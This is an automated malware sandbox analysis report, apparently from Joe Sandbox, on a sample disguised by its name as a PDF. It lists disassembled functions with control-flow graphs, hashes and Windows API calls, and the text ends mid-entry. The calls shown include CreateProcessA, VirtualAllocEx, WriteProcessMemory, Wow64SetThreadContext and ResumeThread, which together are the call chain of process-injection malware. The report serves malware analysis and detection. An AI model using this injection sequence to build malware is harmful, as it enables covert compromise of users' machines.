                                • Source File: 00000000.00000002.1443665457.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1020000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: e840a780fb2f6d03c00288e4c8de7d67feb57be4a359b21b4fab658fb2dde27e
                                • Instruction ID: f9fb1e144f92779230b17093a1b4f87c3baceb96aa22e5109c21f3654fb4e2ea
                                • Opcode Fuzzy Hash: e840a780fb2f6d03c00288e4c8de7d67feb57be4a359b21b4fab658fb2dde27e
                                • Instruction Fuzzy Hash: E65165B09007498FEB14CFAAD548B9EBBF1AF88304F20849AE049A73A0D7749944CF65
                                Function 0102D4B8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0102D536
                                • GetCurrentThread.KERNEL32 ref: 0102D573
                                • GetCurrentProcess.KERNEL32 ref: 0102D5B0
                                • GetCurrentThreadId.KERNEL32 ref: 0102D609
                                Memory Dump Source
                                • Source File: 00000000.00000002.1443665457.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1020000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 7d40402387f55b21e4c832d0d3bc04cbcf2a1b87eeb310aa054d17106ab03bfd
                                • Instruction ID: 7dde161df57e51fa6a96dd2c8166db899cd232db47e82e2dc78a0c0a173986f5
                                • Opcode Fuzzy Hash: 7d40402387f55b21e4c832d0d3bc04cbcf2a1b87eeb310aa054d17106ab03bfd
                                • Instruction Fuzzy Hash: A45156B09007498FEB14CFAAD548B9EBBF1EF48304F20849AE409A7390D7749944CF65
                                Function 07110C8C Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 45 7110c8c-7110d2d 48 7110d66-7110d86 45->48 49 7110d2f-7110d39 45->49 56 7110d88-7110d92 48->56 57 7110dbf-7110dee 48->57 49->48 50 7110d3b-7110d3d 49->50 51 7110d60-7110d63 50->51 52 7110d3f-7110d49 50->52 51->48 54 7110d4b 52->54 55 7110d4d-7110d5c 52->55 54->55 55->55 58 7110d5e 55->58 56->57 59 7110d94-7110d96 56->59 65 7110df0-7110dfa 57->65 66 7110e27-7110ee1 CreateProcessA 57->66 58->51 61 7110db9-7110dbc 59->61 62 7110d98-7110da2 59->62 61->57 63 7110da4 62->63 64 7110da6-7110db5 62->64 63->64 64->64 67 7110db7 64->67 65->66 68 7110dfc-7110dfe 65->68 77 7110ee3-7110ee9 66->77 78 7110eea-7110f70 66->78 67->61 70 7110e21-7110e24 68->70 71 7110e00-7110e0a 68->71 70->66 72 7110e0c 71->72 73 7110e0e-7110e1d 71->73 72->73 73->73 75 7110e1f 73->75 75->70 77->78 88 7110f80-7110f84 78->88 89 7110f72-7110f76 78->89 91 7110f94-7110f98 88->91 92 7110f86-7110f8a 88->92 89->88 90 7110f78 89->90 90->88 94 7110fa8-7110fac 91->94 95 7110f9a-7110f9e 91->95 92->91 93 7110f8c 92->93 93->91 96 7110fbe-7110fc5 94->96 97 7110fae-7110fb4 94->97 95->94 98 7110fa0 95->98 99 7110fc7-7110fd6 96->99 100 7110fdc 96->100 97->96 98->94 99->100 102 7110fdd 100->102 102->102
                                APIs
                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07110ECE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449552879.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7110000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 3f235fe766319e228eb466afa69a272070a41ae772d7bbb3342627fb7d1f8653
                                • Instruction ID: 0488b64f7af19742692a507d3885c52a2cd9dd394d979ca91675fe2f7e788869
                                • Opcode Fuzzy Hash: 3f235fe766319e228eb466afa69a272070a41ae772d7bbb3342627fb7d1f8653
                                • Instruction Fuzzy Hash: E3A13CB1D0071ACFEF15DF69C8417EEBBB2AF48310F148569D858AB280DB749985CF91
                                Function 07110C98 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 103 7110c98-7110d2d 105 7110d66-7110d86 103->105 106 7110d2f-7110d39 103->106 113 7110d88-7110d92 105->113 114 7110dbf-7110dee 105->114 106->105 107 7110d3b-7110d3d 106->107 108 7110d60-7110d63 107->108 109 7110d3f-7110d49 107->109 108->105 111 7110d4b 109->111 112 7110d4d-7110d5c 109->112 111->112 112->112 115 7110d5e 112->115 113->114 116 7110d94-7110d96 113->116 122 7110df0-7110dfa 114->122 123 7110e27-7110ee1 CreateProcessA 114->123 115->108 118 7110db9-7110dbc 116->118 119 7110d98-7110da2 116->119 118->114 120 7110da4 119->120 121 7110da6-7110db5 119->121 120->121 121->121 124 7110db7 121->124 122->123 125 7110dfc-7110dfe 122->125 134 7110ee3-7110ee9 123->134 135 7110eea-7110f70 123->135 124->118 127 7110e21-7110e24 125->127 128 7110e00-7110e0a 125->128 127->123 129 7110e0c 128->129 130 7110e0e-7110e1d 128->130 129->130 130->130 132 7110e1f 130->132 132->127 134->135 145 7110f80-7110f84 135->145 146 7110f72-7110f76 135->146 148 7110f94-7110f98 145->148 149 7110f86-7110f8a 145->149 146->145 147 7110f78 146->147 147->145 151 7110fa8-7110fac 148->151 152 7110f9a-7110f9e 148->152 149->148 150 7110f8c 149->150 150->148 153 7110fbe-7110fc5 151->153 154 7110fae-7110fb4 151->154 152->151 155 7110fa0 152->155 156 7110fc7-7110fd6 153->156 157 7110fdc 153->157 154->153 155->151 156->157 159 7110fdd 157->159 159->159
                                APIs
                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07110ECE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449552879.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7110000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: f0d64cb2522f305df3264283837e23897f6bfe98d9dffda6e7b8bae6d674dc4e
                                • Instruction ID: 19954affd172fb875b893a1144eed6452cc37e1e66a0253cacaca4b72611aeb9
                                • Opcode Fuzzy Hash: f0d64cb2522f305df3264283837e23897f6bfe98d9dffda6e7b8bae6d674dc4e
                                • Instruction Fuzzy Hash: 8A912CB1D0071ACFEB15DF69C841BDEBBB2BF48310F148569E849AB280DB749985CF91
                                Function 0102B0F8 Relevance: 1.7, APIs: 1, Instructions: 210COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 160 102b0f8-102b117 161 102b143-102b147 160->161 162 102b119-102b126 call 102a48c 160->162 164 102b15b-102b19c 161->164 165 102b149-102b153 161->165 168 102b128 162->168 169 102b13c 162->169 171 102b1a9-102b1b7 164->171 172 102b19e-102b1a6 164->172 165->164 216 102b12e call 102b7a0 168->216 217 102b12e call 102b78f 168->217 169->161 173 102b1db-102b1dd 171->173 174 102b1b9-102b1be 171->174 172->171 179 102b1e0-102b1e7 173->179 176 102b1c0-102b1c7 call 102a498 174->176 177 102b1c9 174->177 175 102b134-102b136 175->169 178 102b278-102b338 175->178 181 102b1cb-102b1d9 176->181 177->181 211 102b340-102b36b GetModuleHandleW 178->211 212 102b33a-102b33d 178->212 182 102b1f4-102b1fb 179->182 183 102b1e9-102b1f1 179->183 181->179 184 102b208-102b211 call 102a4a8 182->184 185 102b1fd-102b205 182->185 183->182 191 102b213-102b21b 184->191 192 102b21e-102b223 184->192 185->184 191->192 193 102b241-102b245 192->193 194 102b225-102b22c 192->194 218 102b248 call 102ba90 193->218 219 102b248 call 102baa0 193->219 194->193 196 102b22e-102b23e call 102a4b8 call 102a4c8 194->196 196->193 199 102b24b-102b24e 201 102b250-102b26e 199->201 202 102b271-102b277 199->202 201->202 213 102b374-102b388 211->213 214 102b36d-102b373 211->214 212->211 214->213 216->175 217->175 218->199 219->199
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0102B35E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1443665457.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1020000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: 353f35fc4a2181a71b6401ee8a0315aa1b54658da5a92de9da396baf027c2f15
                                • Instruction ID: 241ad59a5e2e0b407dec7e71d6118847995d2dabcc92d3ff28fa04e8d4338d33
                                • Opcode Fuzzy Hash: 353f35fc4a2181a71b6401ee8a0315aa1b54658da5a92de9da396baf027c2f15
                                • Instruction Fuzzy Hash: 7C815670A00B158FE765CF29D4457AABBF1FF88300F10896ED48AD7A40DB75E949CB90
                                Function 0102590C Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 220 102590c-1025916 221 1025918-10259d9 CreateActCtxA 220->221 223 10259e2-1025a3c 221->223 224 10259db-10259e1 221->224 231 1025a4b-1025a4f 223->231 232 1025a3e-1025a41 223->232 224->223 233 1025a60 231->233 234 1025a51-1025a5d 231->234 232->231 236 1025a61 233->236 234->233 236->236
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 010259C9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1443665457.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1020000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: f930ccbb2a8fde59f99ba51312f54d5bec1441f55ebbdcfc1296396593521044
                                • Instruction ID: edcb3bdacff6ae4a900a4d89ca8499e007faa3e72d03fe1458a730c209ec2e65
                                • Opcode Fuzzy Hash: f930ccbb2a8fde59f99ba51312f54d5bec1441f55ebbdcfc1296396593521044
                                • Instruction Fuzzy Hash: D641C270C00729CBEB24CFAAC845BCEFBB5BF49704F20846AD459AB250DB756945CF54
                                Function 01024514 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 237 1024514-10259d9 CreateActCtxA 240 10259e2-1025a3c 237->240 241 10259db-10259e1 237->241 248 1025a4b-1025a4f 240->248 249 1025a3e-1025a41 240->249 241->240 250 1025a60 248->250 251 1025a51-1025a5d 248->251 249->248 253 1025a61 250->253 251->250 253->253
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 010259C9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1443665457.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1020000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: d4f96f1aa9f4c26b0af59e1ca4759c15c002dce9780c65433c549b7a031a3f24
                                • Instruction ID: 888b65026fc1aee5d92f233bf24489dc43f0d828be480e047f14813c3e1d9a93
                                • Opcode Fuzzy Hash: d4f96f1aa9f4c26b0af59e1ca4759c15c002dce9780c65433c549b7a031a3f24
                                • Instruction Fuzzy Hash: 6241C170C00729CBEB24CFA9C8457DEFBB5BF49304F20846AD449AB251DB756945CF94
                                Function 07110608 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 254 7110608-711065e 257 7110660-711066c 254->257 258 711066e-71106ad WriteProcessMemory 254->258 257->258 260 71106b6-71106e6 258->260 261 71106af-71106b5 258->261 261->260
                                APIs
                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 071106A0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449552879.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7110000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 5e72f07e0f66ca53ea9efd1ab8573f8b01d3f444c2b012df37b21557ef5716f1
                                • Instruction ID: 86a1b9d99cb801026e8d826b626df9f7c147a8071e9bebed63c623189a358912
                                • Opcode Fuzzy Hash: 5e72f07e0f66ca53ea9efd1ab8573f8b01d3f444c2b012df37b21557ef5716f1
                                • Instruction Fuzzy Hash: 71215EB1D003599FDB10CFA9C9857DEBBF1FF48320F148529E954A7281C7789540CBA0
                                Function 07110610 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 265 7110610-711065e 267 7110660-711066c 265->267 268 711066e-71106ad WriteProcessMemory 265->268 267->268 270 71106b6-71106e6 268->270 271 71106af-71106b5 268->271 271->270
                                APIs
                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 071106A0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449552879.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7110000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: fe8808dfa82386dc71b93c52abb05d83f4cf0e187e2972c1db6b5a2065471a28
                                • Instruction ID: 7da9831323664b1233d9765d2518b5093962584b903f28276f3907e39fe3af66
                                • Opcode Fuzzy Hash: fe8808dfa82386dc71b93c52abb05d83f4cf0e187e2972c1db6b5a2065471a28
                                • Instruction Fuzzy Hash: 1F2139B1D003199FDB10CFAAC885BDEBBF5FF48310F10842AE958A7240C7789944CBA0
                                Function 0102D6F9 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 275 102d6f9-102d794 DuplicateHandle 276 102d796-102d79c 275->276 277 102d79d-102d7ba 275->277 276->277
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0102D787
                                Memory Dump Source
                                • Source File: 00000000.00000002.1443665457.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1020000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 8e45452dd92944a718416f728346c27c56ad63d8e5af668e5de3f104917df458
                                • Instruction ID: 6f645552d68090d8df22e1184d3234a512c6a62c2d11b6450930674d53fa4e0f
                                • Opcode Fuzzy Hash: 8e45452dd92944a718416f728346c27c56ad63d8e5af668e5de3f104917df458
                                • Instruction Fuzzy Hash: 7B2103B59002599FDB10CFAAD485AEEFFF4FB48310F14845AE958A3350D378A945CF60
                                Function 071106F9 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 280 71106f9-711078d ReadProcessMemory 283 7110796-71107c6 280->283 284 711078f-7110795 280->284 284->283
                                APIs
                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07110780
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449552879.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7110000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: e3cb8183288ab3960579df264272ce39b42477d57acf6145db2462601925f4b0
                                • Instruction ID: 1da4bcca9c3fb57627d20060385d629ede2b0b0a6314c3841f1565361ba09093
                                • Opcode Fuzzy Hash: e3cb8183288ab3960579df264272ce39b42477d57acf6145db2462601925f4b0
                                • Instruction Fuzzy Hash: 382105B1D003599FDB10CFAAD884BEEFBF5BF48310F14852AE559A7240C7789A44CBA1
                                Function 07110471 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 288 7110471-71104c3 290 71104d3-7110503 Wow64SetThreadContext 288->290 291 71104c5-71104d1 288->291 293 7110505-711050b 290->293 294 711050c-711053c 290->294 291->290 293->294
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071104F6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449552879.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7110000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 99548a826c74931bf558e1c3b5a442235c35f8b231bac4d9e6451acd5e5b4890
                                • Instruction ID: a56be8a1a222bee8431af825d4829a6c7a44c12a2686488dc39e95b3399ab429
                                • Opcode Fuzzy Hash: 99548a826c74931bf558e1c3b5a442235c35f8b231bac4d9e6451acd5e5b4890
                                • Instruction Fuzzy Hash: B4213AB1D003498FDB10DFA9C4857EEBBF4AF49314F14842ED459AB681C7789684CFA1
                                Function 07110700 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 308 7110700-711078d ReadProcessMemory 311 7110796-71107c6 308->311 312 711078f-7110795 308->312 312->311
                                APIs
                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07110780
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449552879.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7110000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 0ad336428e66e5bff8b418c71fe72c84e42d40e1188da11d47f756b3e0036da0
                                • Instruction ID: bc987c3fa5386cad4091bd9009dbfe025a2febeadbf35eb78e35722384a2c4c1
                                • Opcode Fuzzy Hash: 0ad336428e66e5bff8b418c71fe72c84e42d40e1188da11d47f756b3e0036da0
                                • Instruction Fuzzy Hash: 8E2114B1C003599FDB10CFAAC885BEEBBF5FF48310F50842AE958A7240D7789940CBA1
                                Function 07110478 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 298 7110478-71104c3 300 71104d3-7110503 Wow64SetThreadContext 298->300 301 71104c5-71104d1 298->301 303 7110505-711050b 300->303 304 711050c-711053c 300->304 301->300 303->304
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071104F6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449552879.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7110000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 08af2881a9750717bbef8ee522c0ab0166657e24f4132035a7b0dea6fd238d6a
                                • Instruction ID: bb58e6ceb17fcaa6a976a126b6a957885bb1cbde7e2c5d8b652bf3d00515498e
                                • Opcode Fuzzy Hash: 08af2881a9750717bbef8ee522c0ab0166657e24f4132035a7b0dea6fd238d6a
                                • Instruction Fuzzy Hash: 962118B1D003098FDB10DFAAC4857EEBBF4EF49310F54842AD559AB280D7789944CFA1
                                Function 0102D700 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 316 102d700-102d794 DuplicateHandle 317 102d796-102d79c 316->317 318 102d79d-102d7ba 316->318 317->318
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0102D787
                                Memory Dump Source
                                • Source File: 00000000.00000002.1443665457.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1020000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: a94536717ccd7639a829846e7b3316f5aeb0c9b38eb08b646ccf822cc7eec25e
                                • Instruction ID: 5dab75f0dd1791f286180b7344ceee3f8fd4cab3b49dd9cb76e316275ff728a7
                                • Opcode Fuzzy Hash: a94536717ccd7639a829846e7b3316f5aeb0c9b38eb08b646ccf822cc7eec25e
                                • Instruction Fuzzy Hash: 9521E2B59002599FDB10CFAAD984ADEFBF8FB48310F14841AE958A3350D378A940CFA1
                                Function 07110548 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 071105BE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449552879.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7110000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: e06dc6d4c93ffaf24a000d893e1bd6c19c745a694db25d6f7f9f4f9629168faa
                                • Instruction ID: 55be86045c932800a57adb72750b9d76a2efe44f981cef91c5d310ceaf8531a8
                                • Opcode Fuzzy Hash: e06dc6d4c93ffaf24a000d893e1bd6c19c745a694db25d6f7f9f4f9629168faa
                                • Instruction Fuzzy Hash: E8114772C002499FDB10DFA9C8457DEBBF5AF48320F14881AE959AB250C7759A50CFA1
                                Function 07110550 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 071105BE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449552879.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7110000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: a22f57f87fa38fbc48db48a5058535f9d88b9fc1af3c7113c9c9fdbf2b950d2d
                                • Instruction ID: 50fcabea9cc58138a0e61559912be4f346b75abe34d4be077461846360774695
                                • Opcode Fuzzy Hash: a22f57f87fa38fbc48db48a5058535f9d88b9fc1af3c7113c9c9fdbf2b950d2d
                                • Instruction Fuzzy Hash: 6D1137728003499FDB10DFAAC845BDEBBF5EF48310F14882AE515A7250C7759540CFA1
                                Function 050BFBC0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448591434.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_50b0000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: fe6a807ee85e50384f51a80519b12bb79db8bd7ef066f503e544922607cc3070
                                • Instruction ID: 6133136f431fef80ab3fda4621438257bae7d699603ba5b3d13680bfa136b6dd
                                • Opcode Fuzzy Hash: fe6a807ee85e50384f51a80519b12bb79db8bd7ef066f503e544922607cc3070
                                • Instruction Fuzzy Hash: BC113A71D043498FDB10DFAAD5457DEFBF4EF48310F248419D519A7240C7796544CBA5
                                Function 0102B2F8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0102B35E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1443665457.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1020000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: d08206f25b5e891f4696a03f4e09fc01abb8de2072275711c852727bdc4cb916
                                • Instruction ID: ab5c3c8d7efd193c2a01920d989e35299c4f1ba30b9d546bfe3aededa4f01f6e
                                • Opcode Fuzzy Hash: d08206f25b5e891f4696a03f4e09fc01abb8de2072275711c852727bdc4cb916
                                • Instruction Fuzzy Hash: 9F111DB6C002598FDB10CF9AC444BDEFBF8EB88320F10846AD969A7210C379A545CFA1
                                Function 071109D4 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 07115175
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449552879.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7110000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: 63fb275524346cd423f0428a8f573b8045119d9cbacff3cebc3f06ad2ef54ad9
                                • Instruction ID: 04e9ba9dcef0a8ff8a1bcd4a0cbfc533ecff4e8e3907ea46100ca62819f917c2
                                • Opcode Fuzzy Hash: 63fb275524346cd423f0428a8f573b8045119d9cbacff3cebc3f06ad2ef54ad9
                                • Instruction Fuzzy Hash: 2F1103B58003499FDB11CF9AC985BDEFBF8EB48310F10846AE958A7340C375A954CFA1
                                Function 07115113 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 07115175
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449552879.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7110000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: 214b815aea1f0b82969a72836c67b7950fd5db8c31480e0684b4415483b2f0a1
                                • Instruction ID: b23285f76b86127f69720ebb08aa414ecc268732ebc382cc6a94eaa93c94feb6
                                • Opcode Fuzzy Hash: 214b815aea1f0b82969a72836c67b7950fd5db8c31480e0684b4415483b2f0a1
                                • Instruction Fuzzy Hash: 6D1103B58002499FDB10CF9AC984BDEBBF4EB48320F20891AD568A7290C374A544CFA1
                                Function 00F5D1D4 Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1443117407.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_f5d000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0e0cb0c68007a0d03481b9f23da5d68baee6e71ff9b1ee809ac19dad5290f76f
                                • Instruction ID: 792b7ebc7902cc23c3a0872cabffc1ed20433ebed0a9063f95661d7c8cc6c857
                                • Opcode Fuzzy Hash: 0e0cb0c68007a0d03481b9f23da5d68baee6e71ff9b1ee809ac19dad5290f76f
                                • Instruction Fuzzy Hash: 2A214671905304EFDB24DF10C9C0B26BBA5FB84325F24C5ADEE094B282C336D84ADB62
                                Function 00F5D01C Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1443117407.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_f5d000_z38PO_20248099-1_pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2f9b6d23ffbf2e1997635dba6388153620c1a6fdcd2c02f548d85509ce733bab
                                • Instruction ID: 1f6115d374dfb4bec0d04dfc1c7fd5f23af7ca4ccf2e26889c1a04d37a5fa1db
